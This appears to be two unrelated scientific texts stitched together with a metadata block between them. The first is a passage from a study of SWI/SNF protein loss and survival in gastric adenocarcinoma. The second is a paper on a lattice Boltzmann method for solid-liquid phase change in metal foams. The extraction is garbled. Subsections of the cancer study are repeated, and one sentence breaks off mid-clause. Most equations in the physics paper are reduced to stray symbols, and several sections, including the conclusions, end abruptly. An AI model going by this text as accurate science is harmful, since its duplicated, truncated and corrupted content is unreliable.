Tumors were classified in analogy to TCGA-classification [10] as proposed by Setia et al. and Ahn et al. [31,32] in EBV + , mismatch repair deficient (MMRD), genomically stable (GS), and chromosomally instable (CIN) cases. Cases that showed nuclear staining by EBER-CISH were considered EBV + . The presence of MMRD was stated in case of loss of nuclear expression of MSH6 or PMS2. GS cases were identified according to aberrant E-cadherin expression. E-cadherin was considered positive if membranous staining was present in more than 50% of tumor cells [33]. Tumors were classified as CIN if an aberrant p53 expression pattern was present. p53 expression was considered aberrant if tumor cells showed complete loss of nuclear expression or if they showed staining with strong intensity in more than 60%. Staining of less than 60% with weak to moderate intensity was considered a wild-type expression pattern [34,35]. Cases that did not meet the above criteria were designated as unclassifiable.
Statistical Analysis
Chi-squared tests were used for hypothesis testing of differences between the relative frequencies. Kaplan-Meier estimates of survival rates were compared by log rank tests. Relative risks were estimated by hazard ratios (HR) from Cox proportional hazard models. Statistical analyses were performed using SPSS, Version 24 (IBM Corp., Armonk, NY, USA) and R Version 4.0.3. Exploratory 5% significance levels (two-tailed) were used for hypothesis testing.
Cohort
The final cohort consisted of 477 patients with adenocarcinoma of the stomach or the gastroesophageal junction (Table 1). Of these, 130 patients received neoadjuvant chemotherapy and 347 underwent primary resection. The mean age of the cohort was 70.0 (range: 30.0-95.0) years, median follow up was 58.0 (range: 49.9-66.1) months; 52% of patients died during the follow-up period. Detailed clinicopathological characteristics are shown in Table 1.
SMARCA4 Expression
Analyses showed complete loss of SMARCA4 expression in three cases (0.6%). All tumors show an anaplastic solid and rhabdoid growth pattern (Figure 1), advanced T-stages, lymph node, and liver metastases. The median survival was eight (range: 7-12) months. Two patients received neoadjuvant chemotherapy and showed no response (TRG3). Two are subclassified as GS and one as CIN in analogy to the TCGA classification. All three cases were localized at the gastroesophageal junction (AEGII). Seven additional tumors (1.4%) showed reduced SMARCA4 expression. In all three cases with SMARCA4 loss, the expression of ARID1A and SMARCB1 was intact, whereas SMARCA2 was reduced in two of them and completely lost in one case as well. In one case, tumor cells turned out to be negative with both CK7 and CK20, whereas vimentin was expressed with a distinct perinuclear dot-like pattern. In addition, there was no expression of CDX2, and EMA was expressed in all three cases with SMARCA4 loss.
SMARCA2, SMARCB1, and ARID1A Expression
Complete loss of ARID1A was observed in 59 (12.5%) and reduced expression in 11 (2.3%) cases. SMARCA2 expression was lost in 25 (5.4%) tumors and reduced in 65 (13.9%) cases. No case showed complete loss of SMARCB1. However, a heterogeneous expression pattern was detected in one case (0.2%). In addition, five cases (1.1%) showed reduced expression. Complete loss of PBRM1 occurred in 26 cases (5.5%) for PBRM1 and nine cases As shown in Figure 2L, the largest overlap of aberrant expression can be seen between aberrant expression of SMARCA2 and ARID1A in 26 cases. One case showed simultaneous aberration of SMARCA4, SMARCA2, ARID1B, and PBRM1. No case with aberration of all the proteins involved in the SWI/SNF complex could be detected.
In cases of SMARCA2 loss, parallel loss of ARID1A occurred nine times. Seven of these nine cases showed intestinal type according to Laurén.
SMARCA2, SMARCB1, and ARID1A Expression
Complete loss of ARID1A was observed in 59 (12.5%) and reduced expression in 11 (2.3%) cases. SMARCA2 expression was lost in 25 (5.4%) tumors and reduced in 65 (13.9%) cases. No case showed complete loss of SMARCB1. However, a heterogeneous expression pattern was detected in one case (0.2%). In addition, five cases (1.1%) showed reduced expression. Complete loss of PBRM1 occurred in 26 cases (5.5%) for PBRM1 and nine cases (1.9%) for ARID1B. Because both PBRM1 (31.4%), and ARID1B (49.8%) showed a very high proportion of cases with reduced expression, only cases with complete loss were designated as aberrant for consideration of the SWI/SNF status. Representative images of aberrant expression patterns are shown in Figure 2A-K and images of all cases with complete loss are presented in Supplementary Figure S1. In Figure 2M-R retained expression patterns of the proteins are shown.
As shown in Figure 2L, the largest overlap of aberrant expression can be seen between aberrant expression of SMARCA2 and ARID1A in 26 cases. One case showed simultaneous aberration of SMARCA4, SMARCA2, ARID1B, and PBRM1. No case with aberration of all the proteins involved in the SWI/SNF complex could be detected.
In cases of SMARCA2 loss, parallel loss of ARID1A occurred nine times. Seven of these nine cases showed intestinal type according to Laurén.
SWI/SNF Status, Clinicopathologic Characteristics, and Survival
In the following, patients are classified according to the expression of the SWI/SNF proteins. If any of the proteins SMARCA2, SMARCA4, SMARCB1, or ARID1A showed reduced expression or loss, the case was designated as SWI/SNF-aberrant (SWISNFab). The cases with reduced and lost expression were combined because no survival difference was observed between the two groups (p = 0.452) (Supplementary Figure S3). Only complete loss of PBRM1 or ARID1B expression was considered aberrant.
Cases with SWISNFab were associated with advanced T-stage and MMRD subtype (each p < 0.01) and in CTx patients with low chemotherapy response (p = 0.023). Other associations with clinicopathological characteristics are presented in Table 1.
In the overall cohort no significant survival difference regarding the SWI/SNF status could be observed (p = 0.130) ( Figure 3A).
Determination of SWI/SNF Status Using a Focused Panel of Protein Expression
To verify whether it is possible to reduce the panel for determining SWI/SNF status, only aberrant expression of SMARCA2, SMARCA4, SMARCB1, and ARID1A was considered and designated as SWI/SNFfocused. In the subgroup analyses, the prognostic effect of SWISNFab was seen especially in tumors that were classified as GS in analogy to the TCGA classification (p < 0.014) ( Figure 3B). SWISNFab patients had a median survival of 21.0 (range: 8.5-33.5) months compared to cases with intact expression with 46.0 (range: 23.8-68.2) months. In Cox regression analysis (Table 2), including known prognostic parameters, SWISNFab emerged as an independent prognostic factor for overall survival (HR 1.90, CI 1.04-3.50, p = 0.039) in GS tumors. In the other subgroups, no survival difference was seen with respect to SWI/SNF status. The corresponding survival curves are presented in Supplementary Figure S3. The SWISNF expression status and survival of subgroups according to TCGA can be found in Supplementary Figure S4.
Determination of SWI/SNF Status Using a Focused Panel of Protein Expression
To verify whether it is possible to reduce the panel for determining SWI/SNF status, only aberrant expression of SMARCA2, SMARCA4, SMARCB1, and ARID1A was considered and designated as SWI/SNFfocused. Compared with SWI/SNF status, 18 patients were thus not classified as aberrant ( Figure 2L). With regard to clinicopathologic characteristics, no essential difference was detected between SWI/SNF and SWI/SNFfocused (Supplementary Table S2).
Discussion
To the best of our knowledge, no study has evaluated the clinical relevance of the SWI/SNF complex in a large Western cohort of gastric cancer patients [21][22][23][24]36].
This study addressed this issue and analyzed the clinicopathological and prognostic relevance of the SWI/SNF complex in gastric adenocarcinomas with or without neoadjuvant CTx. We additionally investigated the association of the SWI/SNF complex with molecular subgroups in analogy to the TCGA.
The SWI/SNF complex has important functions in the mobilization of nucleosomes and consequently influences gene expression. Genes encoding subunits of the SWI/SNF complex are mutated in approximately 20% of all human tumors [18][19][20]37]. In our cohort, 32% of cases showed alteration of at least one of the subunits of the SWI/SNF complex, namely SMARCA2, SMARCA4, SMARCB1, ARID1A, PBRM1, and ARID1B.
Alterations of SMARCA4 occur in very low frequencies in solid tumors. We observed a loss of SMARCA4 expression in three cases (0.6%). Similar frequencies have been observed in other studies in gastric, esophageal, and lung carcinomas [22,24,30,38]. All three tumors with SMARCA4 deficiency showed very similar, specific histopathologic features and were located at the gastroesophageal junction (AEGII). Additionally, they showed very adverse clinical characteristics and poor survival. The specific growth pattern and clinical significance have been described by Agaimy et al. [21] in two cases and Huang et al. [22] in six cases. As described by Agaimy et al. [21] the expression pattern of cytokeratins was different among the SMARCA4-deficient cases. In the case of SMARCA4 loss, epithelial membrane antigen (EMA) seems to be an adequate marker to proof epithelial differentiation, whereas vimentin showed only in one case, a typical perinuclear dot-like pattern [39]. Furthermore, we observed >50% residual tumor (TRG3) in the two cases with SMARCA4 deficiency and preoperative CTx. As in adenocarcinomas of the lung and esophagus, no case with complete loss of SMARCB1 could be detected, suggesting that this subunit of the SWI/SNF complex does not play an overly important role in gastric carcinomas [24,30,38].
SWI/SNF alteration within at least one of its subunits was an independent negative prognostic factor for overall survival. This is totally in line with a very recently published large Asian gastric cancer cohort study, where SWI/SNF was altered in 35% of carcinomas and associated with a negative prognostic effect of altered SWI/SNF mainly in non-MSI/EBV diffuse type gastric carcinomas. Lacking data according to the molecular classification, this study could not further subclassify this non-MSI/EBV type [24]. Interestingly, we identified the GS group as mainly influenced by alterations of the SWI/SNF complex. The already-poor prognosis of this group that accounts for 23% of cases in our study was dramatically worsened in the SWSNFab group with a median survival time of 21 versus 46 months. In the GS subgroup 29 (19%) cases showed altered SWI/SNF. In contrast to the Asian study, we did not observe a survival difference in the subgroup analyses according to Laurén subtypes [24]. There might be an overlap with the diffuse type as 83% of the carcinomas in our GS subgroup were classified as diffuse type. Regarding the relatively high percentage of SWI/SNF-deficient carcinomas and the poor prognosis especially in the GS subtype, there is urgent need for new therapeutic strategies.
For ARID1A-deficient cancer cells, Ogiwara et al. [40] showed that they express low levels of gluthation (GSH), which makes them specifically vulnerable to inhibition of the GSH metabolic pathway. Additionally, increased sensitivity of ARID1A-deficient cancer cells to treatment with small molecule inhibitor of the PI3K/AKT pathway or selective sensitivity of EZH2 inhibitors against ARID1A-deficient gastric cancer could be demonstrated [41][42][43]. EZH2 inhibitor tazemostat is currently investigated in ongoing clinical trials including SMARCA4-negative solid tumors [18]. The most promising potential therapeutic option so far seems to be the sensitivity to double-strand DNA breaks inducing agents like PARP inhibitors because of the impairment of the DNA damage checkpoint [44]. PARP inhibitors are currently evaluated in several ongoing clinical trials. Furthermore, Shorstova et al. [45] found SWI/SNF compromised cancers to be susceptible to bromodomain inhibitors. An allosteric inhibitor of SMARCA2 and SMARCA4 has demonstrated anti-proliferative activity in a mouse xenograft model of SMARCA4-mutant lung cancer [20]. Initial studies showed the potential efficiency of checkpoint inhibitors and promotion of anti-tumor immunity in SWI/SNF-deficient tumors [46,47]. Interestingly, SMARCB1-mutant rhabdoid tumors and SMARCA4-mutant small cell carcinoma of the ovary have an immune active microenvironment and are responsive to immune-checkpoint inhibition [18,48,49]. We could also observe a strong association of SWI/SNF deficiency with MMRD subtype, for which checkpoint-inhibition is already a therapeutic option [50,51].
The analysis of a reduced panel of proteins to determine the SWI/SNF status proved to be almost equivalent in terms of determining the prognosis. Especially with regard to a possible determination of SWI/SNF status in routine diagnostics, it seems reasonable to limit the determination of SWI/SNF status in gastric cancer to SMARCA4, SMARCA2, and ARID1A.
Despite the comprehensive analysis of a large cohort, our study has limitations, which are mainly related to its retrospective nature. Our study has to be considered as an exploratory analysis and the results have to be validated in independent prospective cohorts. To elucidate the underlying molecular mechanisms of the alteration, we identified on the protein expression level, that sophisticated genetic and epigenetic investigations are necessary.
Conclusions
In summary, the expression of SMARCB1, does not appear to be of major importance in gastric carcinoma. The determination of SWI/SNF status with analyses of SMARCA2, SMARCA4, and ARID1A could be considered in routine practice, especially in the GS subgroup according to TCGA, to identify patients who might potentially benefit from new therapeutic alternatives.
Supplementary Materials: The following are available online at https://www.mdpi.com/article/ 10.3390/cancers13153894/s1, Figure S1: SWI/SNF expression status and survival in subgroups according to TCGA; Figure S2: Kaplan-Meier curves of the patients with aberrant, reduced, and intact expression of ARID1A (A), SMARCA2 (B), SMARCA4 (C), SMARCB1 (D), PBRM1 (E), and ARID1B (F) are shown; Figure S3: Survival in cases with complete and reduced expression of SWI/SNFfocused status; Figure S4: SWI/SNF expression status and survival in subgroups according to TCGA; Table S1: Antibodies and dilutions; Table S2: Clinicopathological characteristics and SWI/SNFfocused status; Table S3: Cox regression analysis of SWI/SNFfocused status. Informed Consent Statement: Patient consent was waived due to the retrospective study type with anonymization of patients.
Data Availability Statement:
The datasets generated during the current work are available from the corresponding author on reasonable request. | 2021-08-08T05:23:27.391Z | 2021-08-01T00:00:00.000 | {
"year": 2021,
"sha1": "a03cbccf761888e2260daafa55fac97ec2772fcd",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2072-6694/13/15/3894/pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "a03cbccf761888e2260daafa55fac97ec2772fcd",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
25020552 | pes2o/s2orc | v3-fos-license | An enthalpy-based multiple-relaxation-time lattice Boltzmann method for solid-liquid phase change heat transfer in metal foams
In this paper, an enthalpy-based multiple-relaxation-time (MRT) lattice Boltzmann (LB) method is developed for solid-liquid phase change heat transfer in metal foams under local thermal non-equilibrium (LTNE) condition. The enthalpy-based MRT-LB method consists of three different MRT-LB models: one for flow field based on the generalized non-Darcy model, and the other two for phase change material (PCM) and metal foam temperature fields described by the LTNE model. The moving solid-liquid phase interface is implicitly tracked through the liquid fraction, which is simultaneously obtained when the energy equations of PCM and metal foam are solved. The present method has several distinctive features. First, as compared with previous studies, the present method avoids the iteration procedure, thus it retains the inherent merits of the standard LB method and is superior over the iteration method in terms of accuracy and computational efficiency. Second, a volumetric LB scheme instead of the bounce-back scheme is employed to realize the no-slip velocity condition in the interface and solid phase regions, which is consistent with the actual situation. Last but not least, the MRT collision model is employed, and with additional degrees of freedom, it has the ability to reduce the numerical diffusion across phase interface induced by solid-liquid phase change. Numerical tests demonstrate that the present method can be served as an accurate and efficient numerical tool for studying metal foam enhanced solid-liquid phase change heat transfer in latent heat storage. Finally, comparisons and discussions are made to offer useful information for practical applications of the present method.
I. INTRODUCTION
Over the past three decades, latent heat storage (LHS) using solid-liquid phase change materials (PCMs) has attracted a great deal of attention because it is of great importance for energy saving, efficient and rational utilization of available resources, and optimum utilization of renewable energies [1][2][3][4][5]. Solid-liquid PCMs absorb or release thermal energy by taking advantage of their latent heat (heat of fusion) during solid to liquid or liquid to solid phase change process. PCMs have many desirable properties, such as high energy storage density, nearly constant phase change temperature, small volume change, etc. However, the available PCMs commonly suffer from low thermal conductivities (in the range of 0.2~0.6 W/(m·K) [1]), which prolong the thermal energy charging and discharging period. In order to overcome this limitation and improve the thermal performance of LHS units/systems, a lot of heat transfer enhancement approaches have been developed, among which embedding PCMs in highly conductive porous materials (e.g., metal foams, expanded graphite) to form composite phase change materials (CPCMs) has long been practiced [6]. High porosity open-cell metal foams, as a kind of promising porous materials with high thermal conductivity, large specific surface area, and attractive stiffness/strength properties, have been widely used for LHS applications [7].
With new experimental techniques and advanced instruments, experimental investigations of heat transfer behaviors in porous systems are becoming more accessible, and the problems of solid-liquid phase change heat transfer in metal-foam-based PCMs have been experimentally studied by many researchers [8][9][10][11][12]. In addition to experimental studies, numerical analyses usually play an important role in studying such problems. In the past two decades, numerical investigations have been extensively conducted to study solid-liquid phase change heat transfer in metal foams [13][14][15][16][17][18][19][20][21][22][23]. These numerical investigations provide valuable design guidelines for practical applications of LHS technologies. Since the thermal conductivity of the metal foam is usually two or three orders of magnitude higher than that of the PCM, the thermal non-equilibrium effects between the PCM and metal foam may play a significant role. Therefore, the local thermal non-equilibrium (LTNE) model (also called the two-temperature model) has been widely employed for numerical studies [14][15][16][17][18][19][20][21][22][23]. However, most of the previous numerical studies [13][14][15][16][17][18][19][20] for solid-liquid phase change heat transfer in metal foams were carried out using conventional numerical methods [mainly finite-volume method (FVM)] based on the discretization of the macroscopic continuum equations. In order to get a thorough understanding of the underlying mechanisms, more fundamental approaches should be developed for solid-liquid phase change heat transfer in metal foams.
The lattice Boltzmann (LB) method [24][25][26][27][28], as a mesoscopic numerical method sitting in the intermediate region between microscopic molecular dynamics (MD) and macroscopic continuum-based methods, has achieved great success in simulating fluid flows and modeling physics in fluids since its emergence in 1988 [29][30][31][32][33]. Historically, the LB method originated from the lattice gas automata (LGA) method [34], a simplified, fictitious version of the MD method in which the time, space, and particle velocities are all discrete. Later He and Luo [35,36] demonstrated that the LB equation can be rigorously obtained from the linearized continuous Boltzmann equation of the single-particle distribution function. The establishment of such connection not only makes the LB method more amenable to numerical analysis, but also puts the LB method on the solid theoretical foundation of kinetic theory. From this perspective, the LB method can be viewed as a Boltzmann equation-based mesoscopic method. Between the microscopic MD and macroscopic continuum-based methods, there also exist several other Boltzmann equation-based mesoscopic methods, such as the discrete-velocity method (DVM) [37] and the gas-kinetic scheme (GKS) [38,39], as representatives. Unlike the MD method which takes into account the movements and collisions of all the individual molecules, the LB method considers the behaviors of a collection of pseudo-particles (a pseudo-particle is comprised of a large number of molecules) moving on a regular lattice with particles residing on the nodes. This feature of the LB method is similar to that of the direct simulation Monte Carlo (DSMC) method [40][41][42]. Different from the conventional numerical methods based on a direct discretization of the macroscopic continuum equations, the LB method is based on minimal lattice formulations of the continuous Boltzmann equation for single-particle distribution function, and macroscopic properties can be obtained from the distribution function through moment integrations. As highlighted by Succi [43], the LB method should most appropriately be considered not just as a smart Navier-Stokes solver in disguise, but rather like a fully-fledged modeling strategy for a wide range of complex phenomena and processes across scales.
In recent years, the LB method in conjunction with the enthalpy method has been successfully employed to simulate solid-liquid phase change heat transfer in metal foams [21][22][23]. Gao et al. [21] proposed a thermal LB model to simulate melting process coupled with natural convection in open-cell metal foams under LTNE condition. The influence of foam porosity and pore size on the melting process were investigated and discussed. Subsequently, Gao et al. [22] further developed a thermal LB model for solid-liquid phase change in metal foams under LTNE condition. By appropriately choosing the equilibrium temperature distribution functions and discrete source terms, the energy equations of the PCM and metal foam can be exactly recovered. Most recently, Tao et al. [23] employed an enthalpy-based LB method to study the LHS performance of copper foams/paraffin CPCM. The effects of geometric parameters such as pore density and porosity on PCM melting rate, thermal energy storage capacity and density were investigated.
Up to now, although some progresses have been made in studying solid-liquid phase change heat transfer in metal foams, there are still two key issues remain to be resolved. The first one is to avoid iteration procedure so as to improve the accuracy and computational efficiency. In previous studies [21][22][23], the nonlinear latent heat source term accounting for the phase change is treated as a source term in the LB equation of the PCM temperature field, which makes the explicit time-matching LB equation to be implicit. Therefore, an additional iteration procedure is needed at each time step so that the convergent solution of the implicit LB equation can be obtained, which severely affects the computational efficiency, and the inherent merits of the LB method are lost. The second key issue is to accurately realize the no-slip velocity condition in the interface and solid phase regions. For solid-liquid phase change heat transfer in metal foams, the phase interface is actually a region with a certain thickness because of the interfacial heat transfer between PCM and metal foam [15]. Therefore, the phase interface is usually referred as the interface region or mushy zone. Considering the actual situation of the phase change process, it is not appropriate to use the bounce-back scheme to impose the no-slip velocity condition in the interface region (this point will be demonstrated in Section V B).
In the present study, we aim to develop a novel enthalpy-based LB method for solid-liquid phase change heat transfer in metal foams, in which the above-mentioned key issues will be resolved.
Considering that the multiple-relaxation-time (MRT) collision model [28] is superior over its Bhatnagar-Gross-Krook (BGK) counterpart [27] in simulating solid-liquid phase change heat transfer in metal foams, the MRT collision model is employed in the enthalpy-based LB method. We will compare these two collision models in Section V A. The rest of this paper is organized as follows. The macroscopic governing equations are briefly given in Section II. Section III presents the enthalpy-based MRT-LB method in detail. Section IV validates the enthalpy-based MRT-LB method. In Section V, comparisons and discussions are made to offer useful information for practical applications of the present method. Finally, some conclusions are given in Section VI. the thermal dispersion effects and surface tension are neglected. To take the non-Darcy effect of inertial and viscous forces into consideration, the flow field is described by the generalized non-Darcy model (also called the Brinkman-Forchheimer extended Darcy model) [44][45][46]. The volume-averaged mass and momentum conservation equations of the generalized non-Darcy model can be written as
II. MACROSCOPIC GOVERNING EQUATIONS
where f ρ is the density of the PCM, u and p are the volume-averaged velocity and pressure, respectively, φ is the porosity of the metal foam, e v is the effective kinematic viscosity, and F is the total body force induced by the porous matrix (metal foam) and other external force fields, which can be expressed as [45,46] where K is the permeability, f v is the kinematic viscosity of the PCM ( f v is not necessarily the same as e v ), and G is the buoyancy force. The inertial coefficient F φ (Forchheimer coefficient) and permeability K depend on the geometry of the metal foam. For flow over a packed bed of particles, based on Ergun's experimental investigations [47], F φ and K can be expressed as [48] where p d is the solid particle diameter (or mean pore diameter). For metal foam with 0.8 φ = considered in the present study, F φ is set to be 0.068 [15,49].
The LTNE model is employed to take into account the temperature differences between metal foam and PCM. According to Refs. [15,17,20], the energy equations of the PCM (including liquid and solid phases) and the metal foam can be written as follows The underlined term in Eq. (5) is the nonlinear latent heat source term accounting for the phase change.
Based on the Boussinesq approximation, the buoyancy force G in Eq. (3) is given by where g is the gravitational acceleration, β is the thermal expansion coefficient, and 0 T is the reference temperature. The effective thermal conductivities of the PCM and metal foam are defined by respectively. The thermal conductivity and specific heat of the PCM are given as follows Under the local thermal equilibrium (LTE) condition, i.e., f m T T T = = , the energy equations (5) and (6) can be replaced by the following single-temperature equation [50] ( ) ( where
In what follows, an MRT-LB method in conjunction with the enthalpy method will be presented for solid-liquid phase change heat transfer in metal foams under LTNE condition. The method is constructed in the framework of the triple-distribution-function (TDF) approach: the flow field, the temperature fields of PCM and metal foam are solved separately by three different MRT-LB models.
For two-dimensional (2D) problems considered in the present study, the two-dimensional nine-velocity (D2Q9) lattice is employed. The nine discrete velocities { } i e of the D2Q9 lattice are given by [27] ( ) ( is the lattice speed with t δ and x δ being the discrete time step and lattice spacing, respectively.
A. MRT-LB model for flow field
The MRT method [28,71] is an important extension of the relaxation LB method developed by Higuera et al. [25]. In MRT method, the collision process of the LB equation is executed in moment space, while the streaming process of the LB equation is carried out in velocity space. By using the MRT collision model, the relaxation times of the hydrodynamic and non-hydrodynamic moments can be separated. According to Ref. [72,73], the MRT-LB equation with an explicit treatment of the forcing term can be written as where ( ) 1 1 1 1 1 1 1 1 1 4 1 1 1 1 2 2 2 2 4 2 2 2 2 1 1 1 1 0 1 0 1 0 1 1 1 1 0 2 0 2 0 1 1 1 Through the transformation matrix M , the collision process of the MRT-LB equation (12) can be executed in moment space where the bold-face symbols m , eq m , and S denote 9-dimensional column vectors of moments, e.g., The streaming process is still carried out in velocity space The transformation matrix Μ linearly maps the discrete distribution functions represented by 9 ∈ = f V R to their velocity moments represented by 9 ∈ = m M R , as in the following The equilibrium moment eq m corresponding to m is defined as [73] where ρ ρ = f , and 1 α and 2 α are free parameters. The forcing term in moment space S is given by [73] ( ) 2 2 2 2 2 6 6 0, , , , , , , , where x F and y F are x-and y-components of the total body force F , respectively.
As mentioned in Section I, it is not appropriate to use the bounce-back scheme (liquid fraction 0.5 l f = is defined as the phase interface, the collision process (14) is performed for 0.5 impose the no-slip velocity condition in the interface region. To accurately realize the no-slip velocity condition in the interface and solid phase regions, the volumetric LB scheme [67] is employed in the present study. By using the volumetric LB scheme, the flow field is modeled over the entire domain (including liquid and solid phase regions). Considering the effect of the solid phase, the density distribution function i f is redefined as where + i f is given by Eq. (15), and 0 = s u is the velocity of the solid phase. The above equation is based on a kinetic assumption that the solid phase density distribution function is at equilibrium state. Accordingly, the macroscopic density ρ and velocity u are defined as The macroscopic pressure p is given by Eq. (22) is a nonlinear equation for the velocity u because F also contains the velocity. According to Ref. [74], the macroscopic velocity u can be calculated explicitly by Through the Chapman-Enskog analysis of the MRT-LB equation (12), the mass and momentum conservation equations (1) and (2) can be recovered in the incompressible limit. The effective kinematic viscosity e v and the bulk viscosity B v are given by 2 e 1 1 2 respectively, where 7, ( ) where 0 4 9 = w , 1~4 1 9 w = , and 5~8 1 36 w = .
B. MRT-LB models for temperature fields
For solid-liquid phase change heat transfer in metal foams under LTNE condition, the temperature fields are solved separately by two different MRT-LB models: an enthalpy-based MRT-LB model is proposed to solve the PCM temperature field, while an internal-energy-based MRT-LB model is proposed to solve the metal foam temperature field. In this subsection, the MRT-LB models for temperature fields will be presented. In addition, some remarks about the MRT-LB models will also be presented.
Enthalpy-based MRT-LB model for PCM temperature field
By combining the nonlinear latent heat source term where l H is the enthalpy of the liquid PCM, and s H is the enthalpy of the solid PCM.
For the PCM temperature field governed by Eq. (28), the following MRT-LB equation of the where M is the transformation matrix [see Eq. (13)], and the relaxation matrix. The collision process of the above MRT-LB equation is executed in moment where = g n Mg is the moment, and = eq eq g n Mg is the corresponding equilibrium moment. Here, eq i g is the equilibrium enthalpy distribution function in velocity space. The streaming process is carried out in velocity space The equilibrium moment eq g n can be chosen as where ,ref f c is a reference specific heat. As did in Ref. [66], the reference specific heat is introduced into the equilibrium moment to make the specific heat and thermal conductivity of the PCM decoupled.
To recover the enthalpy-based energy equation (28), the source term in moment space PCM S is chosen as where PCM S is given by The enthalpy-based energy equation (28) is actually a nonlinear convection-diffusion equation with a source term. Therefore, a time derivative term 1 as suggested in the literature [75]. Without this derivative term, there must exist an unwanted in the macroscopic equation recovered from the MRT-LB equation (31). The details will be described later through the Chapman-Enskog analysis [76] in Appendix A.
The enthalpy f H is computed by The relationship between the enthalpy f H and temperature f T is given by The equilibrium enthalpy distribution function eq i g in velocity space is given by 1~8.
Internal-energy-based MRT-LB model for metal foam temperature field
The energy equation (6) of the metal foam can be rewritten as For the metal foam temperature field governed by the above equation, the MRT-LB equation of where h = n Mh is the moment, and eq eq h = n Mh is the corresponding equilibrium moment. Here, eq i h is the equilibrium internal-energy distribution function in velocity space. The streaming process is carried out in velocity space where metal S is given by The temperature m T is defined by The equilibrium internal-energy distribution function eq i h in velocity space is given by Through the Chapman-Enskog analysis [76] of the MRT-LB equation (31), the following macroscopic energy equation can be obtained (see Appendix A for details) where ( ) Remark II. For solid-liquid phase change without convective effect, i.e., the velocity u is zero, the additional term in Eq. (50) disappears. For solid-liquid phase change coupled with natural convection, the additional term has no effect on numerical simulations in most cases, thus it has been neglected in the present study. Theoretically, to remove the additional term, the approaches in Refs. [67,75] can be employed.
Remark III. The energy equations (28) and (41) , , , which does not affect the inherent merits of the LB method. Unlike the iteration method in previous studies [21][22][23], the MRT-LB equation (31) is completely local and is easy to implement in the same way as the standard MRT-LB equation.
Remark IV. The two-dimensional five-velocity (D2Q5) lattice can also be employed. The MRT-LB models for the temperature fields based on D2Q5 lattice are presented in Appendix B.
C. Boundary conditions and relaxation rates
In this subsection, the boundary conditions and relaxation rates are briefly introduced. For velocity and thermal boundary conditions, the non-equilibrium extrapolation scheme [77] is employed. It should be noted that the no-slip velocity boundary condition on the walls is treated based on i f + rather than i f , i.e., they are treated before the consideration of the effect of the solid phase. For a boundary node b is unknown, the discrete density distribution function at the boundary node b x is given by As reported in Ref. [66], by using the above relationship, the numerical diffusion across the phase interface can be significantly reduced in simulating solid-liquid phase change problems without porous media. Although solid-liquid phase change heat transfer in metal foams is much more complicated, the relationship given by Eq. (53) is employed in the present study.
IV. NUMERICAL TESTS
In , Pr where L is the characteristic length, ΔT is the characteristic temperature, The blue solid and red dashed lines represent the present and the FDM results, respectively.
B. Melting coupled with natural convection
In this subsection, numerical simulations of melting coupled with natural convection in a square cavity filled with metal-foam-based PCM are carried out to validate the present method. The schematic diagram of this problem is shown in Fig. 4. It can be seen from the figure that the present results agree well with the FVM solutions [15].
From Fig. 5(a) it can be seen that at 6 Ra 10 = , the heat transfer process is dominated by conduction because the metal foam-to-PCM thermal conductivity ratio is very large ( 3 10 λ = ), and the shape of the phase interface is almost planar during the melting process. As Ra increases to 8 10 , the effect of natural convection on the shape of the phase interface becomes stronger. As shown in Fig. 5(b), due to the convective effect, the phase interface moves faster near the top wall. As mentioned in Section I, for solid-liquid phase change in metal-foam-based PCMs, the phase interface is a diffusive interface with a certain thickness rather than a sharp interface, which is usually referred as the interface region or mushy zone. In Fig. 6, the streamlines with the phase interface at different Fourier numbers for 6 Ra 10 = are shown. From the figure we can see that, during the melting process ( Fo 0.002 ≤ ), the thickness of the phase interface is around ten lattices, as a result of the interfacial heat transfer between PCM and metal foam. In the quasi-steady regime ( Fo = 0.008 ), the movement of the phase interface is slow enough and it only occupies one or two lattices. The streamlines with the phase interface at different Fourier numbers for 8 Ra 10 = are shown in Fig. 7.
The overall behavior is similar to that with 6 Ra 10 = , albeit with stronger convective effect. The temperature profiles at the mid-height ( 0.5 y L = ) of the cavity at different Fourier numbers for 6 Ra 10 = and 8 10 are shown in Fig. 8. As can be seen in the figure, the temperature profiles of the PCM and metal foam develop together in a coupled manner. Initially ( Fo 0.00005 = ), the metal foam-to-PCM temperature difference is rather high, but it progressively decreases with the Fourier number. At Fo 0.006 = , the temperature profiles of the PCM and metal foam are seen to be nearly identical, which indicates that the thermal non-equilibrium effect between the PCM and metal foam is weak. Fig. 8 clearly shows that the maximum metal foam-to-PCM temperature difference appears near the phase interface. For comparison, the FVM results [15] are also presented in the figure (for clarity, the FVM results at Fo 0.006 = are not presented). It can be observed from the figure that the present results agree well with the FVM results reported in the literature. The variations of the total liquid fraction with the Fourier number for 6 Ra 10 = are shown in Fig. 9. As shown in the figure, the metal foam helps utilize the PCM much more effectively.
B. Volumetric LB scheme vs. bounce-back scheme
In the literature [62], the bounce-back scheme was used to impose the no-slip velocity condition on the phase interface and in the solid phase region. Although this approach has some drawbacks [see Ref. [67] for details], it can produce reasonable results when the phase interface occupies one or two lattices. However, for solid-liquid phase change heat transfer in metal foams under LTNE condition, it is not appropriate to use the bounce-back scheme to impose the no-slip velocity condition because the phase interface is actually a region (the so-called interface region or mushy zone) with a certain thickness during phase change process (see Figs. 6 and 7). In what follows, comparisons between the volumetric LB scheme and bounce-back scheme are made to demonstrate this point. In Fig. 11, the streamlines at different Fourier numbers are shown. Clearly, significant small-scale (of the order of lattice size) oscillations can be seen in the streamlines obtained by bounce-back scheme [see Fig. 11(a)], while the streamlines obtained by volumetric LB scheme are smooth [see Fig. 11(b)]. In the flow field obtained by bounce-back scheme, nonphysical oscillations occur near the phase interface [marked by the red circles in Fig. 12(a), and note that, 0.5 l f = is defined as the phase interface]. On the contrary, the flow field obtained by volumetric LB scheme [see Fig. 12(b)] is rather reasonable. As can be seen in Fig. 12(b), the flow in the interface region is much weaker than that in the liquid phase region near the liquid/mushy interface. It is found that y u in the liquid phase region near the liquid/mushy interface is
C. Present enthalpy scheme vs. iteration enthalpy scheme
In previous studies [21][22][23], the nonlinear latent heat source term [the underlined term in Eq. (5)] is treated as a source term in the LB equation of the PCM temperature field, which makes the explicit time-matching LB equation to be implicit. Therefore, the iteration enthalpy scheme [60] is needed so as to obtain the convergent solution of the implicit LB equation. By using the present enthalpy scheme, the iteration procedure can be avoided in simulations. In Table I
VI. CONCLUSIONS
